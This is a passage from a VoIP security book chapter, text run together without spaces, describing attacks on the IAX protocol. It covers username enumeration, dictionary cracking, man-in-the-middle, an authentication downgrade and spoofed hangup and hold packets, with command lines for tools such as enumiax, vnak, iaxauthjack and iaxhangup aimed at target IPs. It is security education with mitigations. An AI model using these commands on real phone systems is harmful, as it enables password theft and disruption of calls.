onMD5hashes.Thismethodprotectsagainsttheuseofcleartextpasswordsoverthenetworkaswellasreplayattacks.However,theauthenticationschemeisvulnerabletocommonauthenticationattacks,includingdictionaryattacks.Theprotocolalsorequiresstorageoftheactualpasswordasthepasswordverifier,[5]increasingthelikelihoodofaservercompromise.Ingeneral,MD5allowsanyweakorstrongpasswordtobehashedwithoutsendingthepasswordoverthenetworkincleartext.Forexample,ifanendpointweretousethepasswordSonia,whichisaweakpasswordbecauseithasonlyfivecharactersandnonumbers,theMD5hashthatwouldbeusedisCCD5614CD5313D6091A96CE27C38EB22.WhilecreatinganMD5hashensuresthatthepasswordisnotsentoverthenetworkincleartext,itexposesanotherproblem,whichistheuseofpassword-equivalentvalues.Password-equivalentvaluescreatetwopotentialsecurityrisks.First,theMD5hashvalueofSoniaisalwaysthesame,makingitvulnerabletoareplayattack.AnattackercouldsimplysnifftheMD5hashoverthenetworkanduseitlatertobeauthenticated.Theattackerdoesnotneedtoknowwhattherealpasswordis,becausetheMD5hash(thepassword-equivalentvalue)iswhatissenttotheauthenticatingdevice.Second,tospeeduptheprocess,theattackercouldsimplycreateanMD5hashforeverywordinthedictionary(apre-computed,brute-forceattack)andsendthosevaluestotheauthenticatingdevice.Whiletheattackerwouldnotknowthecorrectpassword,eventuallyshewouldsendanMD5hashthatmatchesahashforacorrectpassword.Inordertopreventreplayattacks,IAXsupportsthechallenge/responsemethod.ThismeansthatIAX'sMD5authenticationdoesnotrequiretheuseofapasswordorapassword-equivalentvalue.Instead,anauthenticator,suchasanAsteriskserver,sendsachallengetotheendpointforeachuniqueauthenticationrequest.Forexample,ifanIAXendpointtriedtoauthenticatefivedifferenttimes,itwouldbegivenone
challengeforeachofthefiveauthenticationattempts.Oncetheendpointreceivesthechallengefromtheauthenticator,theendpointconcatenatesthechallengewithitspasswordandcreatesanMD5hashofthecombinedvalues.ThisMD5hashissentoverthenetworktotheauthenticatingdeviceforcomparison.Theauthenticatingdevice,alsoknowingthechallengeandpassword,willcomparethehashreceivedagainstanMD5hashbasedonwhatitexpectstoreceive.IftheMD5hashgeneratedbytheauthenticatormatchestheMD5hashsentoverthenetworkbytheendpoint,thentheauthenticatorknowsthatthecorrectpasswordwasusedbytheendpoint.IftheMD5hashsentoverthenetworkbytheendpointdoesnotmatchtheonecreatedinternallybytheauthenticatingdevice,thentheauthenticatorknowsthatthecorrectpasswordwasnotused(andtheendpointisnotsuccessfullyauthenticated).Figure5-1showsanexampleoftheIAXauthenticationprocess.It'simportanttounderstandthatthechallenge/responsemethoddefendsagainstreplayattacksbyusinguniquechallengesforeveryauthenticationrequest.Anattackerwhosniffstheauthenticationprocessofanendpointcannotreplayavalidresponse,asthechallengeusedtocreatethehashisvalidforthatuniqueauthenticationrequestonly.TheattackerwouldbetryingtoreplayanMD5hashthatwascreatedwithanoldchallengetiedtoanothersession,whichisthereforeuseless.
Figure5-1.IAXauthentication
[2]AllreferencestoIAXrefertoIAX2.[3]ClientendpointisdefinedasanysoftorhardphonethatsupportstheIAXprotocol.[4]See(http://tools.ietf.org/id/draft-guy-iax-03.txt/).[5]Passwordverifiersarethedatathatmustbestoredinordertoauthenticateapeer.Ideally,passwordverifiersarenotpasswordsorpasswordequivalents.
IAXSecurityAttacksNowthatweknowthebasicsoftheIAXprotocolanditsuseinauthentication,let'sdiscusssomeofthemanysecurityattacks.Inthissection,wewilldiscussthefollowingVoIPattacksondevicesusingIAXforsessionsetupandmediacommunication:
UsernameenumerationOfflinedictionaryattack(IAX.Brute)ActivedictionaryattackMan-in-the-middleattackMD5-to-plaintextdowngradeattack(IAXAuthJack)DenialofServiceattacks
RegistrationRejectCallRejectHangUPHold/Quelch(IAXHangup)
UsernameEnumeration
IAXusernamescanbeenumerated,inamannersimilartotheprocessdescribedinChapter3fortheH.323protocol.UsernameenumerationofvalidIAXuserscanbecompletedusingtheenumIAXtoolwrittenbyDustinD.Trammel.WhenauthenticationisrequiredbetweenanIAXclientandanAsteriskserver,theIAXclientsendsitsusernameandpassword,asindicatedinthearchitecturedepictedinFigure5-1.Inordertoenumeratetheusername,enumIAXcanuseeithersequentialusernameguessingoradictionaryattack.Sequentialusernameguessingcreatesusernamesbasedonalphanumericcharacters(lettersathroughzandnumbers0through9),thoughthesecanbeupdatedinthecharmap.hfile.In
contrast,thedictionaryattackusesalistofdictionarywordsfromthedictfileratherthantryingtoauto-constructthem.Asyoureadthischapter,youwillseejusthoweasilytheusernamecanbeobtained.CompletethefollowingexercisetoenumerateIAXusernames:
1. StartNemesisfromtheBackTrackLiveCD.2. WhilebootedtotheBackTrackLiveCD,download
enumIAXfromhttp://sourceforge.net/project/showfiles.php?group_id=181899/.
3. InstallenumIAXwiththefollowingsteps:tarzxvfenumiax-1.0.tar.gz
cdenumiax-1.0
make
makeinstall
cd/usr/local/bin
4. Attheshellprompt,usethefollowingsyntaxtostartenumIAXundersequentialmode,attemptingusernamesthathavebetweenfourandeightcharacters:
enumiaxtarget-ip-address-m4-M8-v(e.g.,enumiax172.16.1.100-m4-M8-v)
5. Next,useenumIAXunderdictionarymodebyusingthefollowingsyntaxattheshellprompt:[6]
enumiaxtarget-ip-address-ddict-v(e.g.,enumiax172.16.1.100-ddict-v)
OfflineDictionaryAttack
AlthoughtheIAXMD5authenticationmethodpreventspasswordsfrombeingexposedincleartextandevenpreventsreplayattacks,itisstillvulnerabletosomecommonauthenticationattacks.Inparticular,anofflinedictionaryattackpresentstheriskofcompromisedsecurityifthesystemusesweakpasswords.
Figure5-1depictedtheAsteriskserversendingachallengeoverthenetworktotheIAXendpoint.Thischallengeisusedincreatingtheendpoint'sMD5authenticationresponse,whichisalsosentoverthenetwork.Becausethechallengeandtheresponsearebothtransmittedincleartext,theyarereadilyavailabletoapassiveadversarywhomightbelisteningonthenetwork.Thus,whilethechallenge/responsemethodensuresthattheauthenticationhashisnotusefulfordirectreplay,thehashcouldstillbeusedinconjunctionwiththechallengetoinferthepassword.Unlikeanonlinebrute-forceattack,whereinanattackerattemptstoauthenticatetotheserverbyrepeatedlyusingguessedpasswords,anofflinedictionaryattackallowsanattackertocheckpasswordscomputationallyonhisownsystem.CheckingformatchingMD5hasheswithoutaccessingthetargetedsystemisnotonlyquicker,italsomitigatestheriskoflockoutafteracertainnumberoffailedattempts.Hereishowitworks.Ifapersonwhoknewhowtocount,butnothowtoadd,wantedtosolvetheproblemof8+x=15,shewouldneedonly7attempts(1through7)beforebrute-forcingthecorrectanswer.Thesameideaappliestoanofflinedictionaryattack.Ifanattackerknowsthechallengesentbyaserveris214484840andtheresultingMD5hashisfc7131a20c49c3d96ba3e2e27d27,shecantestanygivenpasswordbyconcatenatingthepasswordwiththechallengeandcomputingtheMD5.Iftheresultisequaltothehashtheattackersniffedoverthenetwork,theattackerhasguessedthecorrectpassword.SeeFiguresFigure5-2andFigure5-3formoredetails.
Figure5-2.Offlinedictionaryattack
NoticethelastrowinFigure5-3,wherethegeneratedMD5hashmatchesthesniffedMD5hashcapturedoverthenetwork.Thisinformationallowstheattackertoverifythatshehasidentifiedthecorrectpassword,whichis123voiptest.Furthermore,unlikeotherpasswordattacks,theattackerneedstocaptureachallengeandMD5hashonlyoncetocarryouttheattack.ThechallengewillalwaysbevalidfortheMD5hashsniffedoverthenetwork,givingtheattackeralltheinformationrequiredtoperformapassiveattack.
Figure5-3.Detailsoftheofflinedictionaryattack
Toillustratehowapassivedictionaryattackworks,Ihavereleasedaproof-of-concepttoolcalledIAX.Brute.IAX.Bruteisapassivedictionaryattacktoolforimplementingthechallenge/responseauthenticationmethodsupportedinVoIPIAXimplementations.Usingadictionaryfileof280,000words,aninterceptedchallenge,andavalidcorrespondinghash,IAX.Brutecanidentifymostpasswordsinlessthanoneminute.(IAX.Brutecanbedownloadedfromhttp://www.isecpartners.com/tools.html/.)Tobegin,IAX.BruterequirestheusertosniffthechallengeandtheMD5hashbetweentwoIAXendpoints.Thisprocessisaneasytask,becausebotharetransmittedoverthenetworkincleartext.Oncetheuserhascapturedthisinformation,IAX.Bruterevealsthepasswordbycheckingagainstanydictionaryfilesuppliedbytheuser.(IAX.Bruteincludesastandarddictionaryfilewithmorethan280,000commonpasswords.)Duringthisprocess,IAX.BrutecreatesanMD5hashfromtheuser-suppliedchallengeandawordinthedictionaryfile.OncetheMD5hashgeneratedbythetoolmatchestheMD5hashsniffedoverthenetwork,theuserhassuccessfullycompromisedtheIAXendpoint'spassword.SeeFiguresFigure5-4throughFigure5-6asexamples.
Figure5-4.Thechallenge(214484840)andusername(voiptest1)sniffedoverthenetworkincleartext
Figure5-5.TheMD5hashsniffedoverthenetworkincleartext
Figure5-6.IAX.Brutecompromisingthepassword123voiptest
NoticeinFigure5-6thatIAX.Brutesimplywalksthroughfourstepstoidentifythepassword:
1. IAX.Bruteloadsitsdictionaryfile.You'llfindisec.dict.txtincludedwiththetool,butanydictionaryfilecanbeused.
2. Usersuppliesthechallenge,whichinthiscaseis214484840.
3. UsersuppliestheMD5hashthatwassniffedoverthenetwork.FromFigure5-5weseethatthehashisfc7131a20c49c3d96bf69ba3e2e27d27.
4. IAX.Bruteperformsthepassivedictionaryattackand,usingtheseexamples,identifiesthepasswordas123voiptest.
ActiveDictionaryAttack
Inadditiontopassiveattacks,IAXisalsovulnerabletopre-computeddictionaryattacks.Pre-computedattacksrequiretheattackertotakeasinglechallengeandconcatenateitwithalistofpasswordstocreatealonglistofMD5hashes.Oncealistofpre-computedhasheshasbeencreated,theattackertakesthesamechallengethatwasusedtocreateallthehashes
andissuesittoanIAXclientendpoint.Inorderfortheattacktowork,thevictimmustalreadyhavesentanauthenticationrequestpackettotheAsteriskserver.TheattackerthenspoofstheresponsebyusingtheIPaddressoftheAsteriskserver,thensendsapacketusingherownchallengebeforetherealchallengepacketfromtheAsteriskserverreachestheclient.Additionally,toensurethattheattacker'sspoofedpacket(usingthesourceIPoftheAsteriskserver)reachesthevictimfirst,theattackercancreateapacketinwhichthesequenceinformationislowenoughforthevictimtoassumeitshouldbeprocessedbeforeanyotherchallengepacketwithahighersequencenumber.Thiswillguaranteethattheattacker'schallengewillbeusedbytheendpointtocreatetheMD5authenticationhash.Whentheendpointreceivesthechallengefromtheattacker,itwillrespondwithanMD5hashderivedfromtheattacker'schallengeanditsownpassword.Tocompletetheattack,theattackersimplymatchesthehashsentbytheendpointtoapre-computedhashcreatedbytheattacker.Oncetheattackerfindsamatch,thepasswordhasbeencompromised.Awaytocarryoutthisattackistoconcatenate101320040witheverywordintheEnglishdictionary,whichwouldcreatealistofpre-computedhashes.Oncethelisthasbeencreated,theonlysteptheattackerneedstocompleteistosendapackettotheendpointwiththechallengeof101320040.Whentheendpointreceivesthechallenge,itwillsendtheMD5hashoverthenetwork.Theattackercansimplysnifftheresponseandcompareitwiththepre-computedlist.Onceoneofthepre-computedMD5hasheshasbeenmatchedtothehashcapturedfromthetarget,theattackerknowsthepassword.Figure5-7showsanexampleofthepre-computedattackusingactivepacketinjection.
Figure5-7.Pre-computeddictionaryattack
NoticeinFigure5-7thattheattackerhascreatedalistofpre-computedhashesbasedonthechallengeof101320040(shownatthelowerleft).Whentheattackerinjectsthatchallengeduringtheendpoint'sauthenticationprocess,theclientcreatesanMD5hashusingtheattacker'schallenge.Unlikethepassivedictionaryattack,whereintheattackerneedstobrute-forcethepassword,oncetheattackersniffstheMD5hashoverthenetwork,shecansimplymatchthesniffedMD5hashtooneofthepre-computedMD5hashes.Ifamatchappears,theattackerhasjustobtainedtheendpoint'spassword.Inordertodemonstratethisissue,theco-authorofthischapter(ZaneLackey)haswrittenatoolinPythoncalledvnak(downloadablefromhttp://www.isecpartners.com/tools.html/).Vnakisatoolthatcanperformmanyattacks,includingapre-computeddictionaryattack(usingoption1).VnakwillforceavulnerableendpointtocreateanMD5authenticationhashusingachallengesentbyanattackerinsteadofalegitimate
server.
Targetedattack
Totestvnakintargetedattackmode,youcanusetheexamplecommandshownhere:
pythonvnak.py-e-a1ServerIP
Usingthissyntax,vnaksendsapre-computedchallengetoitstarget.Thetargetthenreceivesthepre-computedchallenge,combinesitwithitspassword,andsendstheresultingMD5hashbackoverthenetwork.Theattackerthenviewsthishashoverthenetworkandusesittocarryoutadictionaryattack.ThedictionaryattackisgreatlyimprovedovertheofflineattackbecausetheattackeralreadyhasalistofMD5hashesthathavebeencreatedwiththepre-computedchallengeandvariouspasswords.Itshouldbenotedthatvnakcanperformmanyotherattacksdescribedinthischapterandotherchapters,usingthefollowingflags:
Option0 IAX Authenticationdowngrade
Option1 IAX Knownauthenticationchallenge
Option2 IAX Callhangup
Option3 IAX Callhold/quelch
Option4 IAX Registrationreject
Option5 H.323 Registrationreject
Option6 SIP Registrationreject
Option7 SIP Callreject
Option8 SIP Knownauthenticationchallenge
IAXMan-in-the-MiddleAttack
Inadditiontoactiveattacks,IAX'ssupportofthechallenge/responseauthenticationmethodmakesitvulnerabletoman-in-the-middleattacks.ThisattackfirstrequiresaccesstothenetworktrafficbetweentheendpointandtheAsteriskserver,whichcanoftenbeobtainedviaARPcachepoisoningorDNSspoofingtechniques.OnceanattackerisroutingtrafficbetweenalegitimateendpointandtheAsteriskserver,hehasprivilegedaccesstothedatabetweenthem.TheattackercanthenauthenticatetotheAsteriskserverwithoutknowingavalidusernameandpassword.Duringanattack,themalicioususermonitorsthenetworktoidentifywhenanIAXendpointsendsanauthenticationrequesttotheAsteriskserver.Whentheauthenticationrequestoccurs,theattackerinterceptsthepacketsandpreventsthemfromreachingtherealAsteriskserver.TheattackerthensendshisownauthenticationrequesttotheAsteriskserver.Usingthechallenge/responsemethodforauthentication,theAsteriskserversendsachallengetotheattacker.Theattackerreceivesthechallengeandsendsitalongtothelegitimateendpoint,whichisstillwaitingtoauthenticatefromthefirststep.ThelegitimateendpointthensendsavalidMD5hashtotheattacker(derivedfromtherealpasswordandAsterisk'schallenge),thinkingtheattackeristheactualAsteriskserver.OncetheattackerhasthevalidMD5hashfromthelegitimateendpoint,hesendsthehashtotheAsteriskserverandsuccessfullyauthenticates.SeeFigure5-8fordetails.
Figure5-8.IAXman-in-the-middleattack
Theman-in-the-middleattacksignificantlyincreasestheattacksurfaceonIAXimplementations,allowinganattackertoauthenticatetotheAsteriskserverwithoutbrute-forcingasingleusernameandpassword.Formoredetailedinformationonperformingaman-in-the-middleattack,seeChapter2forstep-by-stepinstructionsonusingCain&Abel.
MD5-to-PlaintextDowngradeAttack
TheIAXprotocolspecificationassumesthatimportantsecurityprotectionsaregoingtobehandledatothernetworklayers,leavingimplementationspotentiallyvulnerabletoactiveattacks.ThissusceptibilitytoactiveattacksarisesfromthefactthattheIAXprotocoldoesnotprovideintegrityprotection.IntegrityprotectionensuresthatthecommunicationoccurringbetweentherealAsteriskserverandendpointhasnotbeentamperedwithonthewireorhasbeensentfromarogueserverorclient.AnothermajorissueisthepredictabilityofIAXcontrolframesequencing.Forexample,amajorityofthesequencenumbersusedaremerelyincrementedbyoneineachframe.Thisallowsanattackertoeasilypredictthevaluesthatareneededfor
injectingspoofedpackets.ThecombinationoftheseissuesmeansthatvulnerableIAXimplementationscanbedowngradedtoplaintexttransmissionsduringtheauthenticationprocess.Thedowngradeattackcausesanendpoint,whichwouldnormallyuseanMD5digestforauthentication,tosenditspasswordincleartext.Inordertoperformthisattack,theattackermustcompleteafewsteps.First,theattackerneedstosniffthenetwork,[7]watchingforanendpointattemptingtoregistertotheAsteriskserver(AS)usingaregistrationrequest(REGREQ)packet.TheattackerthenparsesouttherequiredvaluesfromtheREGREQpacket,includingtheDestinationCallID(DCID),OutboundSequenceNumber(oseq),InboundSequenceNumber(iseq),usernamelength,andusername.Oncetheinformationhasbeengathered,theattackerneedstoincreasetheiseqvaluetocorrespondtotheexistingsessionoriginallycreatedbytheAS(makingitvalidforaspoofedREGAUTHpacket).Afterthesequenceinformationisincreasedappropriately,theattackerinjectsaspoofedREGAUTHpacketspecifyingthatonlyplaintextauthenticationisallowed.Ifthespoofedpacket"winstherace"backtotheendpoint(aheadoftheAS'srealpacketthatrequiresMD5authentication),theendpointsendsanotherREGREQpacketacrossthenetworkwiththepasswordinplaintext.ThisallowstheattackertorecoverthepasswordfromthenetworkwithastandardsniffersuchasWireshark.[8]SeeFigure5-9foranexample.
Figure5-9.Downgradeattack
Figure5-9showsanendpointattemptingtoregisterwiththeAsteriskserver.Duringtheauthenticationprocess,theattackerextractstherequiredsessioninformationfromthispacket.Oncetheinformationhasbeenobtained,theattackerinjectsaREGAUTHpacketspoofedfromtheAsteriskserverspecifyingthatonlyplaintextauthenticationisallowed.Whentheendpointreceivesthispacket,itrespondswithanotherREGREQwiththepasswordinplaintext(inFigure5-9,thesamplepassword123voiptestisshown).Becausethispasswordissentinplaintext,itcanbeeasilysniffedbyanattacker.Inordertodemonstratethisissue,theco-authorofthischapter(ZaneLackey)haswrittenatoolinPythoncalledIAXAuthJack(downloadablefromhttp://www.isecpartners.com/tools.html/).IAXAuthJackisatoolthatactivelyperformsanauthenticationdowngradeattack,forcingavulnerableendpointtorevealitspasswordinplaintextoverthenetwork.Toachievethis,IAXAuthJacksniffsthenetworkfortrafficindicatingthatregistrationistakingplacebetweentwoIAXendpoints.Oncearegistrationpackethasbeenrecognized,thetooltheninjectsaREGAUTHpacket,whichspecifiesthattheendpointshouldauthenticateinplaintextratherthanMD5orRSA.Thetoolhastwomodesofoperation,whicharedescribedhere.
Targetedattack-id001
TotestIAXAuthJackintargetedattackmode,youcanusethefollowingexamplecommand:
iaxauthjack.py-ieth0-cEndpointIP-sServerIP
Usingthissyntax,IAXAuthJacklistensontheeth0EthernetinterfaceforcontrolframesfromaspecificIAXendpointwhoseIPaddressisspecifiedbythe-cargument.TheServerIPvalueintheprevioussyntaxistheendpointthatisattemptingtoregisterwiththeserver,whoseIPaddressisspecifiedbythe-sargument.IAXAuthJack.pytheninjectsthespoofedREGAUTHpacketbetweentheserverandtheendpoint,causingtheendpointtorespondwithaREGREQpacketwiththepasswordinplaintext.
Wildcardattack
Bycontrast,youcantestIAXAuthJackinwildcardattackmodewiththiscommand:
iaxauthjack.py-ieth0-a-sServerIP
Inthisexample,IAXAuthJacklistensontheeth0interfaceforcontrolframesfromanyIAXendpointthatisattemptingtoregisterwiththeserver.IttheninjectsthespoofedREGAUTHpacket,causingtheendpointtorespondwithitspasswordinplaintext.SeeFigure5-10formoredetails.
Figure5-10.ThepasswordinplaintextintheMD5challengeresultfiledinWireshark
DenialofServiceAttacks
ADenialofServiceattacktargetstheavailabilityofanendpoint,leavingitunusableorunavailableforanextendedperiodoftime.ItisworthnotingthattheconsequencesofDoSattacksdifferinseveritybetweenoneenvironmentandthenext.Forexample,aDoSattackonanNFSdaemonmaypreventendusersfromgatheringfilesoverthenetwork;however,aDoSattackonaVoIPnetworkmightpreventauserfromcalling911incaseofanemergency.WhileanytypeofDoSattackisundesirable,theseverityofaDoSattackonVoIPnetworkscanoftenbehigherbecauseofendusers'relianceonvoicecommunication.Aswithdowngradeauthenticationattacks,predictablesessioninformationandalackofintegrityprotectionopenthedoorforDenialofServiceattacksagainstIAXendpoints.Withoutthesetwofactors,anactiveattackercouldnotspoofthenecessarycontrolframes.
Warning☠
BeawarethatusingAESencryptiontoprotectthevoicetrafficofacalldoesnotpreventDoSattacks.Theseattacksarestillpossible,becausesessioninformationisstillsentincleartext.
ThefollowingsectiondiscussesafewoftheDoSattacksidentifiedintheIAXprotocol.
RegistrationReject
TheRegistrationRejectattackpreventsanendpointfromregisteringtotheAsteriskserver(AS).AnattackermonitorsthenetworkforanendpointthatisattemptingtoregisterwiththeASusingaregistrationrequest(REGREQ)packet.TheattackerthenparsesoutcertainrequiredvaluesfromtheREGREQpacket,suchastheDestinationCallID(DCID),OutboundSequenceNumber(oseq),InboundSequenceNumber(iseq),usernamelength,andusername.Oncethe
informationhasbeenextracted,theattackerincreasestheiseqvaluebytwo(e.g.,161isincreasedto163).Afterthesequenceinformationhasbeenincreasedappropriately,theattackerinjectsaspoofedRegistrationReject(REGREJ)packetfromtheAStotheendpoint.However,thisattackworksonlyiftheattacker'spacketreachesthetargetedendpointbeforetheserver'sREGAUTHpacket.Otherwise,theregistrationprocesscontinuesnormally.SeeFigure5-11foranexample.Figure5-11showsanendpointattemptingtoregistertoanAsteriskserver.Duringtheauthenticationprocess,theattackerpullstherequiredsessioninformationfromtheREGREQpacket.Oncetheinformationhasbeenobtained,theattackerinjectsaREGREJpacket,specifyingthattheauthenticationprocesshasfailed.Whentheendpointreceivesthespoofedpacket,itthinksthattheregistrationprocesshasfailedandignorestheserver'sMD5challenge.
Figure5-11.Registrationrejectattack
CallReject
Thecallrejectattackpreventscallsfrombeingaccepted.Inthisattack,theattackermonitorsthenetworkforindications,suchasNEW,ACCEPT,orRINGINGpackets,thatacalliscomingin.Theattackerthenparsesouttherequiredinformationfromoneofthesepackets,suchasSourceCallID
(SCID),DestinationCallID(DCID),InboundSequenceNumber(iseq),andOutboundSequenceNumber(oseq).Oncetheinformationhasbeenparsed,theattackermanipulatestheiseqandoseqvaluessothatthesequenceinformationwillbevalidforaspoofedREJECTpacket.Afterassemblingapacketbasedonthesevalues,theIPandMACaddressesofthecallrecipient,andtheIPandMACaddressesofthecaller,thespoofedREJECTpacketissenttothecaller.Ifthespoofedpacketreachesthecallerbeforethecallrecipient'sANSWERpacket,thecallerwillthinkthecallhasbeenrejected.Otherwise,thecallwillbeestablishedasintendedandthespoofedpacketwillbeignored.SeeFigure5-12foranexample.
Figure5-12.Callrejectattack
Figure5-12showsanattackermonitoringthenetworkforacallsetuppacket,inthiscaseRINGING,thatindicateswhenanendpointisattemptingtoplaceacall.Theattackerthenpullstherequiredsessioninformationfromthispacket,constructsaspoofedREJECTpacket,andinjectsitintothenetworktraffic.Uponreceivingthispacket,theendpointbelievesthecallhasbeenrejectedandignoresanyfurthercontrolpacketsforit.
HangUP
TheHangUPattackdisconnectscallsthatareinprogressbetweentwoendpoints.Toinitiatetheattack,theattackermonitorsthenetworkforanytrafficthatindicatesacallisinprogress,suchasanANSWERpacket,aPINGorPONGpacket,oravoicepacketwithaudio.Theattackerthenparsesoutthefollowingrequiredvaluesfromoneofthesepackets:theSourceCallID(SCID),DestinationCallID(DCID),InboundSequenceNumber(iseq),andOutboundSequenceNumber(oseq).Oncethisiscomplete,theattackermustmanipulatethesequenceofiseqandoseqvaluestocreateavalidspoofedHANGUPpacket.Finally,theattackerinjectsthespoofedHANGUPpacketwiththenowcorrectinformation,causingthecalltobedropped.SeeFigure5-13foranexample.
Figure5-13.Callhangupattack
Figure5-13showsanexistingcallbetweentwoendpoints,withmediaflowinginbothdirections.Duringaphonecall,acontrolframeissentacrossthenetwork(aPINGinFigure5-13)thatcontainsthesessioninformationneededtocompletethisattack.Fromthatinformation,aspoofedHANGUPpacketiscreatedandsenttoendpointA.OnceendpointAreceivestheinformation,theexistingphonecallisdropped.Atthattime,endpointBisunawareoftheHANGUPandcontinuessendingdata,butendpointAwillnolongerprocessthoseincoming
packets.ZaneLackey,co-authorofthischapter,hascreatedatoolinPythonnamedIAXHangup.pythatautomatesthisattack.Thetoolcanbedownloadedfromhttp://www.isecpartners.com/tools.html/.IAXHangupisatoolthatdisconnectsIAXcalls.Itfirstmonitorsthenetworkinordertodetermineifacallistakingplace.Onceacallhasbeenidentifiedandacontrolframecontainingsessioninformationhasbeenobserved,IAXHangupinjectsaHANGUPcontrolframeintothecalltoforceanendpointtodropit.Thetoolhastwomodesofoperation,whicharedescribedbelow:
Targetedattack-id002
TorunIAXHangupintargetedmode,interruptingacallbetweentwospecificendpoints,usethefollowingsyntax:
iaxhangup.py-ieth0-a1.1.1.1-b2.2.2.2
Inthisexample,thetoollistensontheeth0interfaceforcontrolframesindicatingthatacallistakingplacebetweenhosts1.1.1.1and2.2.2.2.IAXHangup.pytheninjectsaHANGUPcommandtodisconnectthecall.
Wildcardattack-id001
TorunIAXHangupinwildcardmode,whereitwilllookforcallsbetweenanyhosts,usethefollowingsyntax:
iaxhangup.py-ieth0-e
Here,thesyntaxinstructsIAXHanguptolistenontheeth0interfaceforacallbetweenanyhostsonthenetworkanddisruptthemwithHANGUPcontrolframesaccordingly.
Hold(QUELCH)
TheHoldattackisaimedatdisruptingcommunicationbetweentwoendpoints,ratherthanforciblydisconnectingtheircall.To
achievethis,theHoldattackleveragestheQUELCHcommandinIAX,whichisusedtohaltaudiotransmission.ThisattackmaybeusedinsteadofHangUPifanattackerwantstotrickacallerintothinkingthatacallisstillconnected,despitethefactthatthecallercannotbeheardbytheuserontheothersideofthecall.Theattackoccursbyplacingonesideonholdwhilenotnotifyingtheotherside.Forthisattack,theattackeragainmonitorsthenetworkforanysignsthatacallisinprogress,suchasanANSWERpacket,aPINGorPONGpacket,oraMinivoicepacket.TheattackerextractstheSourceCallID(SCID),DestinationCallID(DCID),InboundSequenceNumber(iseq),andOutboundSequenceNumber(oseq)asbeforeandmanipulatestheiseqandoseqvaluessotheywillbevalidforaspoofedHold(QUELCH)packet.Finally,theattackerinjectsthespoofedQUELCHpacket,causingonesideoftheconversationtobeplacedonholdwithouteitheroftheusers'knowledge.SeeFigure5-14foranexample.Figure5-14showsanexistingcallbetweentwoendpoints,withmediaflowinginbothdirections.Duringaphonecall,controlframesaresentacrossthenetwork(here,aPING)thatcontainimportantsessioninformationthatanattackerneedsinordertobuildavalidspoofedpacket.Withthisinformation,theattackercanspoofaQUELCHpacketandsendittoendpointA.Fromthispointforward,theconnectionisstilllivebutstrictlyone-sided.EndpointAwillnolongersendmedia(audio)toendpointB.
Figure5-14.Callrejectattack
[6]Youmayalsowishtoopenthedictfileandaddextrausernamesyouwishtobrute-force.Afewpopularoneshavealreadybeeninsertedintothefile.[7]GainingaccesstonetworktrafficonswitchednetworkisdemonstratedinChapter2withtoolslikeCain&Abel.[8]See(http://www.wireshark.org/).
SummaryIAXhasthepotentialtobeaverypopularprotocolforVoIParchitecturesbecauseofthegrowingpopularityoftheAsteriskPBXsystem.Itssimplenature,friendlinesswithnetworkfirewalls,relianceonasingleUDPport,unifiedsignalingandmediatransferprotocol,andrelativelyfewnetworkcomponents(nomediaproxies,gateways,gatekeepers,orSTUNservers)makeitveryattractive.DespitethemanyoperationalandfunctionaladvantagesoverSIPorH.323,though,itdoesnotfaremuchbetterintermsofsecurity.Infact,theauthenticationweaknessesofSIPandH.323aremirrored,andareinsomecasesworse,inIAX.Furthermore,thelackofuseand/orsupportforencryptioninmediatransfersisverysimilarbetweenIAXandRTP.FactorinthesusceptibilitytoDenialofServiceattacksandIAX,SIP,andH.323allshareasimilarvulnerabilityprofile.However,thepossiblesecuritybenefitsofIAX,aslistedinitsRFC,canbeachievedoncesupportforproperauthenticationandencryptionappearsonIAXendpointsandservers.Forexample,IAXsupportforRSApublicandprivatekeyswouldgreatlystrengthenitsauthenticationmodelagainstpassiveandactivenetworkattacks.Additionally,AESencryptionbasedonasufficientlysecure,pre-setsharedsecretcanencryptmediacommunication.Thiswouldpreventpassiveattackersfromeavesdroppingonorinjectingaudiointotelephoneconversations(aslongasthekeyisnotsentovercleartext).However,whileproperencryptionwouldpreventeavesdroppingandaudioinjection,IAXwillstillbesusceptibletoDenialofServiceattacksaslongassessioninformationremainsincleartext.EvenifencryptionisusedwithIAX,itmustcontinuetoguardagainstdesignflawsthatallowauthenticationdowngradeattacks.
PartII.VOIPSECURITYTHREATS
Chapter6.ATTACKINGVOIPINFRASTRUCTUREVoIPnetworksarevulnerabletomanyformsofcommonnetworkattacks,anddevicesthatsupportVoIPinfrastructurearealsovulnerabletosimilarissues.Inthischapter,wewilldiscussthesecurityweaknessesthataffectthefunctionalcomponentsthatmakeupaVoIPnetwork,fromdevices(hardphones,gatekeepers,registrars,andproxies)toapplications(e.g.,CiscoCallManager,AvayaCallCenter/Server,andvoicemailapplications).Specifically,youwilllearnabout:
Vendor-specificVoIPsniffingCommonhardphonevulnerabilitiesCiscoCallManagerandAvayaCallCenter/ServerattacksSecurityholesintheAvayaModularMessagingVoicemailapplicationInfrastructureserverimpersonation/redirection
AttacksongeneralnetworkservicesthatVoIPutilizes,suchasDHCPandDNS,areoutsidethescopeofthischapter;however,theseservicescanalsobeusedtocompromiseaVoIPnetwork(e.g.,rogueDHCP/DNSserversre-routingtrafficonaVoIPnetwork).Ingeneral,thischapterwillfocusonVoIPtechnologiesonly.
Vendor-SpecificVoIPSniffingSniffingVoIPnetworktrafficisnodifferentfromsniffingaregularnetwork'straffic;however,connectingtotheVoIPnetworkisoftendifferentthanconnectingtoaregularnetwork.Whilemail,DNS,andDHCPserversareaccessibleoncorporateVLANsfromuserworkstations,VoIPnetworksareusuallyondifferentVLANs.Forexample,theVoIPVLANissegmentedfromtraditionaldataprotocols,suchasanorganization'sExchangeorActiveDirectoryserver.Attackers
whoarenotconnectedtothecorrectsegmentbetweenahardphoneandtheVoIPnetworkwillnotbeabletosniffthenetworkproperly.AseparateVLANcanbeusedformanypurposes,includingsecurity,QualityofService(QoS),segmentation,orprioritylevels.KeepinmindthatVoIPpacketsshouldbeahigherprioritythandatapackets,becauseapersonusingaVoIPphoneshouldnotbeaffectedbysomeone'sdownloadingfilesfromapeer-to-peernetwork.Thenatureofvoicecommunicationdemandsreliability.ThesegmentationofVLANshelpsensurethatVoIPpacketswhichneedahigherQoSarenotaffectedbylower-prioritydatapackets.However,manyVoIPvendorswillsaythatusingseparateVLANsthatarenotdirectlyaccessiblefromuserworkstationsisasecurityprotection.Thisassertioncouldnotbefurtherfromthetruth,asgainingaccesstotheVoIPVLANisassimpleasswitchingtwonetworkcables.AnypersoncanusetheVoIPhardphonesittingonauser'sdesktogainaccesstotheVoIPVLANsimplybyunpluggingtheworkstation'sEthernetcablefromthedatanetworkandconnectingittothehardphone'sVoIPnetworkjack.However,it'simportanttopayattent